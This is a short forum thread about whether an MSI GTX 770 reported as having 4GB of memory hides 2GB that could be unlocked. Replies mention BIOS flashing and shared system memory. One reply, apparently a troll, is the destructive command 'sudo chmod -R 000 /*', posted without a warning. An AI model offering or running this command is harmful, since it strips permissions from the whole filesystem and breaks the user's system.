MSI tf GTX 770 ram usage?

so i now own an msi TF GTX 770, now according to the manufacture it has 2GB of ram, but when i was looking at its properties i found it had a total of 4GB of ram.  my main question is: could my card be the same as the 4GB card but just restricted to only 2GB,  and if that is the case, is there a way to unlock that other 2GBs?

They might have made a 2GB model and a 4GB model. Maybe you got the 4GB model.

There are both 2 Gb and 4 Gb versions of that card by MSI. Luckily you might have got 4 Gb model oe you yourself sometimes placed the order for the 4 Gb model. Confirm it now as it might affect warranty later.

o no i ordered the 2GB one and it only uses 2GBs but i think that just to save on production time, they made all the cards 4GBs and just dont allow usage of the other 2GBs

If there is, it certainly involves flashing the bios.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Absolutely not. You have 2GB "Dedicated Vram" the other 1.8GB is a paging file for use like Vram but that's useless.
